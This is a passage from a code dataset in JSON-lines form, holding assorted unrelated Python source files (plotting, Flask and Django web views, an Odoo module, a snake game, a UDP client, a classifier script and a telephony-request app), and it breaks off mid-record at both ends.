3.0, linestyle = '-', label = 'sine')\nplt.legend(loc='upper left', frameon=True)\n# Set x_limits\nplt.xlim(x.min()*1.1, x.max()*1.1)\n #Set y_lim\nplt.ylim(C.min()*1.1, C.max()*1.1)\n\n #set yticks\nplt.yticks([-1, 0, +1], [r'$-1$', r'$0$', r'$+1$'])\n #set xticks\nplt.xticks([-np.pi, -np.pi/2, 0, np.pi/2, np.pi], [r'$-\\pi$', r'$-\\pi/2$', r'$0$', r'$+\\pi/2$', r'$+\\pi$'])\n\nax = plt.gca()\nax.spines['right'].set_color('none')\nax.spines['top'].set_color('none')\nax.xaxis.set_ticks_position('bottom')\nax.spines['bottom'].set_position(('data', 0))\nax.yaxis.set_ticks_position('left')\nax.spines['left'].set_position(('data', 0))\n\n\n\n #save figure using 72n dots per inch\nplt.savefig('plot3.pdf', dpi = 720)\n\n #show results on screen\nplt.show()\nplt.close()\n\n","sub_path":"sincos.py","file_name":"sincos.py","file_ext":"py","file_size_in_byte":1145,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"599829652","text":"#!/home/xulei/Downloads/Python-3.5.1/python\n#!conding:utf-8\n\nimport json\nimport urllib.request\nimport urllib.parse\n\ndef gettime():\n url = 'http://api.k780.com/?app=life.time&appkey=10003&sign=b59bc3ef6191eb9f747dd4e83c99f2a4&format=json'\n response = urllib.request.urlopen(url)\n html = response.read().decode('utf-8')\n target= json.loads(html)\n #print(target['result']['datetime_2'])\n #print(target['result']['week_2'])\n output='''

'''+target['result']['datetime_2']+\"

\"\n output1='''

'''+target['result']['week_2']+\"

\"\n print (output,output1)\nif __name__ == \"__main__\":\n gettime()\n \n","sub_path":"ServerRoot/cgi/time.py","file_name":"time.py","file_ext":"py","file_size_in_byte":684,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"39154419","text":"# -*- coding: utf-8 -*-\n\nimport time\nfrom odoo import api, fields, models, _\nfrom odoo.tools import DEFAULT_SERVER_DATETIME_FORMAT\n\n\nclass InventoryAdjustment(models.Model):\n\t_inherit = 'stock.inventory'\n\n\tforce_date = fields.Datetime(string=\"Force Date\")\n\nclass StockPicking(models.Model):\n\t_inherit = 'stock.picking'\n\n\tforce_date = fields.Datetime(string=\"Force Date\")\n\n\nclass StockMove(models.Model):\n\t_inherit = 'stock.move'\n\n\tdef _action_done(self, cancel_backorder=False):\n\t\tforce_date = time.strftime(DEFAULT_SERVER_DATETIME_FORMAT)\n\t\tif self.env.user.has_group('stock_force_date_app.group_stock_force_date'):\n\t\t\tfor move in self:\n\t\t\t\tif move.picking_id:\n\t\t\t\t\tif move.picking_id.force_date:\n\t\t\t\t\t\tforce_date = move.picking_id.force_date\n\t\t\t\t\telse:\n\t\t\t\t\t\tforce_date = move.picking_id.scheduled_date\n\t\t\t\tif move.inventory_id:\n\t\t\t\t\tif move.inventory_id.force_date:\n\t\t\t\t\t\tforce_date = move.inventory_id.force_date\n\t\t\t\t\telse:\n\t\t\t\t\t\tforce_date = move.inventory_id.date\n\n\t\tres = super(StockMove, self)._action_done()\n\t\tif self.env.user.has_group('stock_force_date_app.group_stock_force_date'):\n\t\t\tif force_date:\n\t\t\t\tfor move in res:\n\t\t\t\t\tmove.write({'date':force_date})\n\t\t\t\t\tif move.move_line_ids:\n\t\t\t\t\t\tfor move_line in move.move_line_ids:\n\t\t\t\t\t\t\tmove_line.write({'date':force_date})\n\t\t\t\t\tif move.account_move_ids:\n\t\t\t\t\t\tfor account_move in move.account_move_ids:\n\t\t\t\t\t\t\taccount_move.write({'date':force_date})\n\t\t\t\t\t\t\tif move.inventory_id:\n\t\t\t\t\t\t\t\taccount_move.write({'ref':move.inventory_id.name})\n\n\t\treturn res\n","sub_path":"stock_force_date_app/models/stock_inventory.py","file_name":"stock_inventory.py","file_ext":"py","file_size_in_byte":1514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"315679470","text":"# Copyright (c) 2012-2013, Mark Peek \n# All rights reserved.\n#\n# See LICENSE file for full license.\n\nfrom aws import Action\n\nservice_name = 'Amazon Elastic MapReduce'\nprefix = 'elasticmapreduce'\n\nAddInstanceGroups = Action(prefix, 'AddInstanceGroups')\nAddJobFlowSteps = Action(prefix, 'AddJobFlowSteps')\nDescribeJobFlows = Action(prefix, 'DescribeJobFlows')\nModifyInstanceGroups = Action(prefix, 'ModifyInstanceGroups')\nRunJobFlow = Action(prefix, 'RunJobFlow')\nSetTerminationProtection = Action(prefix, 'SetTerminationProtection')\nTerminateJobFlows = Action(prefix, 'TerminateJobFlows')\n","sub_path":"awacs/elasticmapreduce.py","file_name":"elasticmapreduce.py","file_ext":"py","file_size_in_byte":603,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"70023928","text":"import RPi.GPIO as GPIO\r\nimport time\r\nimport keyboard\r\nimport sys, tty, termios\r\n\r\ndef main():\r\n GPIO.setmode(GPIO.BCM)\r\n GPIO.setwarnings(False)\r\n # Pin being used to control gun firing\r\n GPIO.setup(18, GPIO.OUT)\r\n\r\n print(\"3 Second Burst\")\r\n \r\n GPIO.output(18, GPIO.HIGH)\r\n time.sleep(3)\r\n GPIO.output(18, GPIO.LOW)\r\n\r\n print(\"End\")\r\n\r\n \r\ndef getch():\r\n fd = sys.stdin.fileno()\r\n old_settings = termios.tcgetattr(fd)\r\n try:\r\n tty.setraw(sys.stdin.fileno())\r\n ch = sys.stdin.read(1)\r\n finally:\r\n termios.tcsetattr(fd, termios.TCSADRAIN, old_settings)\r\n return ch\r\n\r\nmain()\r\n","sub_path":"3secburst.py","file_name":"3secburst.py","file_ext":"py","file_size_in_byte":649,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"520428455","text":"# coding: utf-\n\nfrom datetime import datetime\nimport math\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib as mpl\nfrom matplotlib import cm as cm\nget_ipython().magic(u'matplotlib inline')\nimport scipy.interpolate\nimport pandas as pd\n\nimport shapefile, sys\nimport os\nfrom matplotlib.path import Path\nfrom matplotlib.patches import PathPatch\nfrom matplotlib.ticker import MaxNLocator\nimport pyproj\nimport json\n\n# read in shapefile\nsf = shapefile.Reader(os.getcwd() + '/' + 'shape/tl_2013_us_zcta510.shp')\n\n#read json as a string\njson_file = open('shape/us_zip.json')\njson_str = json_file.read()\n\n#convert to dictionary\njson_data = json.loads(json_str)\n\n#read in nyc zips\ndf = pd.read_csv('zip_borough.csv')\n\n# make a list of the zips\nNY_zips = df['Incident Zip'].tolist()\n\n#create dictionary for nyc\nnyc_zips = {}\nnyc_zips['type'] = u'FeatureCollection'\nnyc_zips['features'] = []\n\n#loop through nys dictionary and keep entries where city is New York\nfor i in json_data['features']:\n if int(i['properties']['ZCTA5CE10']) in NY_zips:\n nyc_zips['features'].append(i)\n\n# save dictionary as json\nwith open('nyc_zips.json', 'w') as outfile:\n json.dump(d, outfile)\n\n# to create a new dictionary with zips is indices and bbox and clean coorinates included\nd = {}\nfor e in nyc['features']:\n bbox = []\n # unravel cleanly\n x = np.vstack([np.array(i).ravel().reshape(-1, 2) for i in e['geometry']['coordinates']])\n # get min lng and min lat\n minx = np.min(x,axis=0)\n # get max lng and max lat\n maxx = np.max(x,axis=0)\n bbox = np.r_[minx,maxx].tolist()\n e['geometry'][u'bbox'] = bbox\n e['geometry'][u'shape'] = x.tolist()\n zip_code = e['properties']['ZCTA5CE10']\n d[zip_code] = e\n\nwith open('nyc_zips_n.json') as f:\n nyc = json.load(f)\n\n# create an rtree to hold the shapes of zips\nfrom rtree import index\n\nidx = index.Index()\nfile_idx = index.Rtree('rtree')\n\n# insert the bounding boxes into the rtree\nfor i in nyc:\n bbox = nyc[i]['geometry']['bbox']\n zipc = nyc[i]['properties']['ZCTA5CE10']\n idx.insert(int(zipc),tuple(bbox))\n file_idx.insert(int(zipc),tuple(bbox))\n\n# test a point\nhits = list(idx.intersection((-73.995516, 40.728137)))\nhits\n# 40.728137, -73.995516\n# -73.986493, 40.693264\n\nimport matplotlib.path as mplPath\n\n# if point has 2 hits, determine which zipcode it falls under\n# bbPath = mplPath.Path(nyc[str(hits[0])]['geometry'['shape']])\n\nreal_zip = 0\nfor i in hits:\n bbPath = mplPath.Path(nyc[str(i)]['geometry']['shape'])\n if bbPath.contains_point((-73.995516, 40.728137)):\n real_zip = i\n\nreal_zip\n\nweather = pd.read_csv('weather_final.csv')\n\n# weather\n\n# load the tree from file\nidx = index.Rtree('rtree')\n\n","sub_path":"Join_Taxi_Weather/json_rtree_zipcodes.py","file_name":"json_rtree_zipcodes.py","file_ext":"py","file_size_in_byte":2709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"651997807","text":"import flask\n\nfrom infrastructure.view_modifiers import response\nfrom services import video_service\nfrom viewmodels.videos.add_video_viewmodel import AddVideoViewModel\nfrom viewmodels.videos.category_viewmodel import CategoryViewModel\nfrom viewmodels.videos.play_viewmodel import PlayViewModel\n\nblueprint = flask.Blueprint('videos', __name__, template_folder='templates')\n\n\n@blueprint.get('/videos/category/')\n@response(template_file='videos/category.html')\ndef category(cat_name: str):\n vm = CategoryViewModel(cat_name)\n return vm.to_dict()\n\n\n@blueprint.get('/videos/play/')\n@response(template_file='videos/play.html')\ndef play(video_id: str):\n vm = PlayViewModel(video_id)\n return vm.to_dict()\n\n\n@blueprint.get('/videos/add/')\n@response(template_file='videos/partials/add_video_form.html')\ndef add_get(cat_name: str):\n vm = AddVideoViewModel(cat_name)\n return vm.to_dict()\n\n\n@blueprint.post('/videos/add/')\ndef add_post(cat_name: str):\n vm = AddVideoViewModel(cat_name)\n vm.restore_from_form()\n\n video_service.add_video(cat_name, vm.id, vm.title, vm.author, vm.view_count)\n\n return flask.redirect(f'/videos/category/{cat_name}')\n\n\n@blueprint.get('/videos/cancel_add/')\n@response(template_file='videos/partials/show_add_form.html')\ndef cancel_add(cat_name: str):\n vm = AddVideoViewModel(cat_name)\n return vm.to_dict()\n","sub_path":"code/ch5_partials/ch5_final_video_collector/views/videos.py","file_name":"videos.py","file_ext":"py","file_size_in_byte":1405,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"45160574","text":"from hashlib import sha256\n\nfrom orycha_db import db\nfrom bson.objectid import ObjectId\nfrom bson.json_util import dumps\nimport pymongo\nservus = db.orycha_servus\n\n\nclass Orycha:\n length = 0\n\n def __init__(self, **kwargs):\n self.token_id = self.get_last_entry_field(field='token_id')\n self.name = kwargs['name']\n self.difficulty = 0\n self.parent_id = self.get_last_entry_field()\n self.parent_hash = self.hash_parent()\n self.data = {}\n\n def __str__(self):\n return 'Orycha -> {}'.format(self.name)\n\n def __repr__(self):\n return 'Orycha #{}'.format(self.token_id)\n\n @classmethod\n def create(cls, **kwargs):\n s = cls(**kwargs)\n servus.insert_one(s.as_dict())\n s._id = str(s._id)\n return s\n\n @classmethod\n def get(cls, **kwargs):\n return servus.find_one(kwargs)\n\n @classmethod\n def get_all(cls, **kwargs):\n cur = servus.find(kwargs)\n nodes_dict = dict()\n for c in cur:\n c['_id'] = str(c['_id'])\n nodes_dict[c['token_id']] = c\n\n return nodes_dict\n\n @classmethod\n def set_data(cls, token_id, data):\n node = servus.find_one({'token_id': token_id})\n difficulty = 0 if not node.get('difficulty') else node['difficulty']\n _ = servus.update_one({'token_id': token_id},\n {'$set': {\n 'data': data\n }})\n current_hash = hash_node(token_id, difficulty=difficulty)\n difficulty += 1\n if difficulty > 9:\n difficulty -= 9\n node = servus.update_one({'token_id': token_id},\n {'$set': {\n 'hash': current_hash,\n 'difficulty': difficulty,\n }})\n return node\n\n @classmethod\n def delete(cls, search_by):\n node = servus.delete_one(search_by)\n return node\n\n def as_dict(self):\n return self.__dict__\n\n def hash_parent(self):\n parent_id = ObjectId(self.parent_id)\n parent = servus.find_one({'_id': parent_id})\n if not parent:\n return\n return sha256(dumps(parent).encode()).hexdigest()\n\n def get_last_entry_field(self, field='_id'):\n cur = servus.find({}).sort('_id', pymongo.DESCENDING).limit(1)\n for c in cur:\n last = c\n break\n\n if not last:\n return 0\n\n if field == '_id':\n return str(last['_id'])\n else:\n return last[field] + 1\n\n\ndef hash_node(token_id, difficulty):\n node = servus.find_one({'token_id': token_id})\n digest = sha256(dumps(node).encode()).hexdigest()\n nonce = 0\n while digest[:2] != str(difficulty) * 2:\n node['nonce'] = nonce\n digest = sha256(dumps(node).encode()).hexdigest()\n nonce += 1\n return digest\n","sub_path":"orycha.py","file_name":"orycha.py","file_ext":"py","file_size_in_byte":2960,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"79501153","text":"import random\nimport curses\n\ninput('Le jeu se joue avec les touches WASD, appuyez sur ENTER pour débuter')\n\n# Initialisation de curses\ncrs = curses.initscr()\n\n# Disable le curseur\ncurses.curs_set(0)\n# Disable l'Affichage de la touche appuyée\ncurses.noecho()\ncurses.cbreak()\n\n# Retourne les dimensions maximales que peut avoir la fenetre\nscreen_height, screen_width = crs.getmaxyx()\n\n# Initialise la fenêtre\nwindow = curses.newwin(screen_height, screen_width, 0, 0)\n\n# Accept les entrées de clavier\nwindow.keypad(1)\n\n# Refreshrate\nwindow.timeout(100)\n\n# Position de départ du snake\nsnake_y = screen_height//2\nsnake_x = screen_width//4\n\n# List contenant la \"queue\" du snake (list de positions)\nsnake = [\n [snake_y, snake_x],\n [snake_y, snake_x-1]\n]\n\n# Objet de la pomme au centre de la page\napple = [screen_height//2, screen_width//2]\n\n# Ajout de l'objet à la fenêtre\nwindow.addch(apple[0], apple[1], curses.ACS_DIAMOND)\n\n# Boucle qui gère le jeux ----------------------------------------------------------------------\nkey = curses.KEY_RIGHT\n\nwhile True:\n # Lecture d'une entrée (une seule entrée gardée en mémoire en même temps)\n next_key = window.getch()\n # Garde la même key si aucune autre n'a été appuyée depuis le dernier refresh\n key = key if next_key == -1 else next_key\n\n # Vérifie si le joueur à perdu -------------------------------------------------------------\n # Si le joueur sort du jeux\n if snake[0][0] in [0, screen_height-1] or snake[0][1] in [0, screen_width-1] :\n curses.endwin()\n print('Vous avez perdu')\n quit()\n\n # Si le joueur se mange lui-même\n if snake[0] in snake[1] :\n curses.endwin()\n print('Vous avez perdu')\n quit()\n\n\n # Mouvement du snake ----------------------------------------------------------------------\n new_pos = [snake[0][0], snake[0][1]]\n\n # W = 119, S = 115, A = 97, D = 100\n if key == 119 :\n new_pos[0] -= 1\n if key == 115:\n new_pos[0] += 1\n if key == 97 :\n new_pos[1] -= 1\n if key == 100 :\n new_pos[1] += 1\n\n # Insert la nouvelle position en premier, pop la dernière\n snake.insert(0, new_pos)\n\n # Si snake mange la pomme -----------------------------------------------------------------\n if snake[0] == apple :\n # Suprime la pomme\n apple = None\n\n # Initialise une nouvelle pomme\n while apple is None:\n new_apple = [\n random.randint(5, screen_height - 5),\n random.randint(5, screen_width - 5)\n ]\n #Vérifie que la nouvelle pomme n'est pas dans le snake, sinon repart l'init\n apple = new_apple if new_apple not in snake else None\n\n window.addch(apple[0], apple[1], curses.ACS_DIAMOND)\n else:\n # On pop juste si snake n'a pas mangé la pomme pour simuler le mouvement.\n # S'il a manger la pomme, le manque de pop fait comme un ajout\n old_pos = snake.pop()\n # Remplacer la dernière position de la queue du snake par un espace vide\n window.addch(old_pos[0], old_pos[1], ' ')\n\n window.addch(snake[0][0], snake[0][1], curses.ACS_CKBOARD)","sub_path":"snake/snake.py","file_name":"snake.py","file_ext":"py","file_size_in_byte":3181,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"22307683","text":"# Create a program to ask the user their name, ask them guess the number I am thinking of between 1 and 10\n\n# Import random module\nimport random\n# Say Hello and get the users name\nmyName = input (\"Hello! What is your name? \")\n# Assign the variable 'number' to a random integer between 1 and 10\nnumber = random.randint(1,10)\n# Tell the user I am thinking of a number between 1 and 10\nprint (\"Well, \" + myName + \" I am thinking of a number between 1 and 10.\")\n# Take the guess from the users keyboard input \nguess = int(input( \"Take a guess: \"))\nif guess == number: \n print(\"Good job, \" + myName + \"! You guessed my number.\")\nif guess != number:\n print (\"Better luck next time.\")\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":680,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"596421085","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Aug 5 09:03:36 2016\n\n@author: ac1513\n\"\"\"\n\nsampleMap = {}\nkmers = []\n\nfile = open('AWNx_filenames.txt', 'r') #contains the names of the files created in the previous step\n\n#building the sampleMap of kmers and samples\nfor line1 in file: #for each txt file created in step 5\n if line1 == '':\n break\n line1 = line1.strip()\n AWNx_file = open(str(line1+'.txt'))\n contig = line1[:-5]\n for line in AWNx_file: #for kmer/sample \n kmer, sample = line.split() \n if kmer not in sampleMap: #for each a new kmer\n sampleMap[kmer] = set() #add the kmer to the dictionary and create new set \n sampleMap[kmer].add(contig) #add the contig data to the set\n else:\n sampleMap[kmer].add(contig) #kmer already exists, so add contig\n if kmer not in kmers:\n kmers.append(kmer) #add the kmer to list for use later\n \nlen_file = sum(1 for line in open('AWNx_filenames.txt'))\n\nfor x in range(0,len(kmers)-1): #x used for first kmer to compare\n for i in range(x+1,len(kmers)): #i used for second kmer to compare - doesn't compare ones already compared in other order\n frequency = len(sampleMap[kmers[x]].intersection(sampleMap[kmers[i]]))/(len_file) #calculate the frequency of the two co-occuring\n if frequency != 0: #ignore any 0's\n print(kmers[x],'\\t',kmers[i],'\\t',frequency)\n\n","sub_path":"06_frequencyKmers.py","file_name":"06_frequencyKmers.py","file_ext":"py","file_size_in_byte":1423,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"248830752","text":"#!/usr/bin/env python\nimport json\nimport re\n\n\ndef main():\n with open('out/england_article.json') as file:\n article = json.loads(file.readline())\n text = article.get('text')\n\n pattern = r'\\[\\[Category:(.*)\\]\\]'\n categories = re.findall(pattern, text)\n for category in categories:\n print(category)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"src/03_regeular_expression/22_extract_category_names.py","file_name":"22_extract_category_names.py","file_ext":"py","file_size_in_byte":369,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"646528680","text":"import argparse\n\nimport sys\n\nimport chat_server\n\n\ndef define_args(arg_vec):\n parser = argparse.ArgumentParser()\n\n parser.add_argument('--host', type=str, default=\"0.0.0.0\")\n parser.add_argument('--port', type=int, default=\"33333\")\n\n _args = parser.parse_args(arg_vec)\n return _args\n\n\nif __name__ == \"__main__\":\n args = define_args(arg_vec=sys.argv[1:])\n\n chat_server.service.serve((args.host, args.port))\n","sub_path":"assets/codes/python/2020-03-16-grpc3/run_server.py","file_name":"run_server.py","file_ext":"py","file_size_in_byte":426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"161335784","text":"import pandas as pd\nimport re\nimport logging\nfrom tqdm import tqdm\nfrom typing import List, Dict\n\n\ndef read_df(names: List[str],\n cols_dtypes: object = None\n ) -> Dict[str, pd.DataFrame]:\n dict_dfs = {}\n logger = logging.getLogger(__name__)\n\n for name in tqdm(names):\n\n def strip_name(name:str) -> str:\n return re.sub(r'.*__|.*/', '', name).split('.', 1)[0]\n\n if name.endswith('.csv?dl=1') or name.endswith('.csv'):\n dict_dfs.update({strip_name(name): pd.read_csv(name, dtype=cols_dtypes)})\n logger.info('name: {0} -- shape: {1}'.format(name, len(dict_dfs)))\n\n elif name.endswith('.h5'):\n dict_dfs.update({strip_name(name): pd.read_hdf(name, dtype=cols_dtypes)})\n print('h5')\n\n else:\n logger.info('Nothing to read')\n\n return dict_dfs\n","sub_path":"notebooks/adase/utils/pandas/read_df.py","file_name":"read_df.py","file_ext":"py","file_size_in_byte":863,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"268294126","text":"from sklearn import svm\nimport numpy as np\nfrom sklearn.externals import joblib\nfrom sklearn.model_selection import GridSearchCV\nimport re\nimport nltk\n# nltk.download_shell()\nfrom nltk.corpus import stopwords\nfrom nltk.stem.porter import *\nstemmer = PorterStemmer()\nfrom nltk.stem.snowball import SnowballStemmer\nfrom multiprocessing import Pool\nimport asyncio\nimport sys\n\npool = Pool()\n\nfriendsModel = joblib.load('../machineLearner/politicsPrediction.pkl')\neachFriendWord = []\nfriendDictionary = {}\neachFriendSer = []\nfriendCategorisation = []\n\nf = open('../machineLearner/politicsFriends.txt', 'r')\ndictionaryString = f.read()\ndictionaryList = dictionaryString.split(' ')\n\nasync def serialiseFriends(friendsArray, trainingModel):\n serialisedFriends = []\n for word in trainingModel:\n if word in friendsArray:\n serialisedFriends.append(1)\n else:\n serialisedFriends.append(0)\n return serialisedFriends\n\nasync def predict(friendsArray):\n male = 0\n female = 0\n serialisedFriends = await serialiseFriends(friendsArray, dictionaryList)\n probability = friendsModel.predict_proba([serialisedFriends])\n print(probability[0][1])\n\nfriendsArray = sys.argv[1].split(';')\nloop = asyncio.get_event_loop()\nloop.run_until_complete(predict(friendsArray))\nloop.close()\n\n","sub_path":"machineLearner/friendPredictor.py","file_name":"friendPredictor.py","file_ext":"py","file_size_in_byte":1314,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"303581212","text":"#!/usr/bin/env python\r\n\r\nfrom socket import *\r\n\r\nHOST = input('input your host: ')\r\nif not HOST:\r\n HOST = '127.0.0.1'\r\nPORT = input('input your port: ')\r\nif not PORT:\r\n PORT = 21567\r\nelse:\r\n PORT = int(PORT)\r\nBUFSIZ = 1024\r\nADDR = (HOST, PORT)\r\nudpCliSock = socket(AF_INET, SOCK_DGRAM)\r\n\r\nwhile True:\r\n data = input(\"> \")\r\n if not data:\r\n break\r\n udpCliSock.sendto(data.encode(), ADDR)\r\n data, ADDR = udpCliSock.recvfrom(BUFSIZ)\r\n data = data.decode()\r\n if not data:\r\n break\r\n print(data)\r\nudpCliSock.close()\r\n","sub_path":"PythonCoreCourse3/ex2/tsUclnt3.py","file_name":"tsUclnt3.py","file_ext":"py","file_size_in_byte":554,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"317822756","text":"from django.conf.urls.defaults import patterns, url\n\nurlpatterns = patterns(\"points.views\",\n url(r\"^$\", \"index\"),\n\n url(r\"^event/new/$\", \"new_event\"),\n url(r\"^event/(\\d+)/$\", \"event_detail\"),\n url(r\"^event/(\\d+)/edit/$\", \"edit_event\"),\n url(r\"^event/(\\d+)/label/edit/$\", \"edit_event_label\"),\n url(r\"^event/label/(.*)/$\", \"events_by_label\"),\n url(r\"^labels/$\", \"all_labels\"),\n\n url(r\"^event/(\\d+)/article/new/$\", \"new_article\"),\n url(r\"^article/(\\d+)/vote/(up|down)/$\", \"vote_article\"),\n\n url(r\"^articles/$\", \"all_articles\"),\n url(r\"^article/domain/(.*)/$\", \"articles_by_domain\"),\n\n url(r\"^register/$\", \"register\"),\n url(r\"^welcome/$\", \"welcome\"),\n url(r\"^user/(.*)/$\", \"user\"),\n url(r\"^users/$\", \"users\"),\n)\n\nurlpatterns += patterns(\"\",\n url(r\"^login/$\", \"django.contrib.auth.views.login\", {\"template_name\": \"login.html\"}),\n url(r\"^logout/$\", \"django.contrib.auth.views.logout\", {\"next_page\": \"/\"}),\n)\n","sub_path":"points/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":953,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"157491219","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.7 (3394)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.linux-x86_64/egg/dataclay/util/tools/python/PythonMetaClassFactory.py\n# Compiled at: 2019-11-11 07:06:07\n# Size of source mod 2**32: 3796 bytes\n\"\"\" Class description goes here. \"\"\"\nfrom dataclay import DataClayObject\nfrom importlib import import_module\nimport logging\nfrom dataclay.commonruntime.ExecutionGateway import loaded_classes\nimport dataclay.util.management.classmgr.UserType as UserType\nfrom dataclay.exceptions.exceptions import DataClayException\nimport traceback\n__author__ = 'Alex Barcelo ', methods=['GET', 'POST'])\ndef newRequest(req):\n\n\tif request.method == 'GET':\n\t\treturn render_template('fetch-data.html', req=req)\n\n\telse:\n\t\tif request.method == 'POST':\n\t\t\t\n\t\t\tuserId = request.form['textUserId']\n\t\t\tcountry = request.form['selectCountry']\n\n\t\t\t# employee = session.query(Employee).filter_by(\n\t\t\t# \tuserId = request.form['textUserId'],\n\t\t\t# \tcountry = request.form['selectCountry']).first()\n\t\t\temployee = checkUserIBM(userId+country)\n\n\t\t\tif employee['result'] == \"OK\":\n\t\t\t\tdata = employee['data']\n\n\t\t\t\tif req == \"Extension\":\n\t\t\t\t\treturn render_template('new-extension.html', emp=data)\n\t\t\t\tif req == \"Analog Line\":\n\t\t\t\t\treturn render_template('new-analogLine.html', emp=employee)\n\t\t\t\tif req == \"Hunt Group\":\n\t\t\t\t\treturn render_template('new-huntgroup.html', emp=employee)\n\t\t\t\tif req == \"Pickup Group\":\n\t\t\t\t\treturn render_template('new-pickupgroup.html', emp=employee)\n\t\t\t\tif req == \"CMC\":\n\t\t\t\t\treturn render_template('new-cmc.html', emp=employee)\n\t\t\t\tif req == \"FAC\":\n\t\t\t\t\treturn render_template('new-fac.html', emp=employee)\n\t\t\t\t\n\t\t\telse:\n\t\t\t\terror = \"User Id doesn't exist in the database.\"\n\t\t\t\treturn render_template('fetch-data.html', req=req, error=error)\n\n\n#New Extension Request\n@app.route('/loadRequest', methods=['GET', 'POST'])\ndef newExtensionReq():\n\n\tif request.method == 'POST':\n\t\tdateCreated = datetime.now().strftime('%Y-%m-%d %H:%M:%S')\n\t\treq = request.form['textRequest']\n\t\tsUUID = str(uuid.uuid1())\n\t\t#print (\"Token: %s\", %sUUID)\n\n\t\tdata = Request(\n\t\t\tuserId = request.form['textUserId'],\n\t\t\ttoken = sUUID,\n\t\t\tmail = request.form['textMail'],\n\t\t\tname = request.form['textName'],\n\t\t\tlastname = request.form['textLastname'],\n\t\t\tfullName = request.form['textFullName'],\n\t\t\trequest = req,\n\t\t\tapprovalLevel = 1,\n\t\t\trequestType = \"new\",\n\t\t\tcountry = request.form['textCountry'],\n\t\t\tsection = \"123\",\n\t\t\tstatus = \"Pending of Manager\",\n\t\t\tdateCreated = dateCreated,\n\t\t\tfirstManagerId = request.form['textManagerId'],\n\t\t\tfirstManagerFullName = request.form['textManager'],\n\t\t\tfirstManagerMail = request.form['textManagerMail'],\n\t\t\tsite = request.form['selectSite'],\n\t\t\tlocation = request.form['textLocation'],\n\t\t\tcontactNumber = request.form['textContactNumber'],\n\t\t\tjustification = request.form['textJustification'])\n\t\n\t\tsession.add(data)\n\t\tsession.commit()\n\t\tsession.refresh(data)\n\n\t\tsUUID = str(uuid.uuid1())\n\n\t\tif req == \"Extension\":\n\t\t\tinfo = Extension(\n\t\t\t\tphone = request.form['selectPhone'],\n\t\t\t\ttoken = sUUID,\n\t\t\t\tvoicemail = request.form['selectVoiceMail'],\n\t\t\t\tdialPermission = request.form['selectDialPermission'],\n\t\t\t\trequest_id = data.ticket)\n\n\t\t\tsession.add(info)\n\t\t\tsession.commit()\n\t\t\tsession.refresh(info)\n\n\t\tif req == \"Analog Line\":\n\t\t\tinfo = AnalogLine(\n\t\t\t\tphone = request.form['selectPhone'],\n\t\t\t\ttoken = sUUID,\n\t\t\t\tvoicemail = request.form['selectVoiceMail'],\n\t\t\t\tdialPermission = request.form['selectDialPermission'],\n\t\t\t\trequest_id = data.ticket)\n\n\t\t\tsession.add(info)\n\t\t\tsession.commit()\n\t\t\tsession.refresh(info)\n\n\t\tif req == \"Hunt Group\":\n\t\t\tinfo = HuntGroup(\n\t\t\t\tgroup = request.form['textGroup'],\n\t\t\t\ttoken = sUUID,\n\t\t\t\trequest_id = data.ticket)\n\n\t\t\tsession.add(info)\n\t\t\tsession.commit()\n\t\t\tsession.refresh(info)\n\n\t\tif req == \"Pickup Group\":\n\t\t\tinfo = PickupGroup(\n\t\t\t\tgroup = request.form['textGroup'],\n\t\t\t\ttoken = sUUID,\n\t\t\t\trequest_id = data.ticket)\n\n\t\t\tsession.add(info)\n\t\t\tsession.commit()\n\t\t\tsession.refresh(info)\n\n\t\tif req == \"CMC\":\n\t\t\tinfo = CMC(\n\t\t\t\ttoken = sUUID,\n\t\t\t\trequest_id = data.ticket)\n\n\t\t\tsession.add(info)\n\t\t\tsession.commit()\n\t\t\tsession.refresh(info)\n\n\t\tif req == \"FAC\":\n\t\t\tinfo = FAC(\n\t\t\t\ttoken = sUUID,\n\t\t\t\trequest_id = data.ticket)\n\n\t\t\tsession.add(info)\n\t\t\tsession.commit()\n\t\t\tsession.refresh(info)\n\n\t\tdescription = \"\"+dateCreated+\" - \"+request.form['textFullName']+\" has requested \"+req+\". \" \\\n\t\t\t\t\"Status: Pending of Manager\"\n\n\t\tload_log(dateCreated, request.form['textUserId'], request.form['textFullName'], \n\t\t\tdata.ticket, req, \"Pending of Manager\", description)\n\n\n\t\treturn 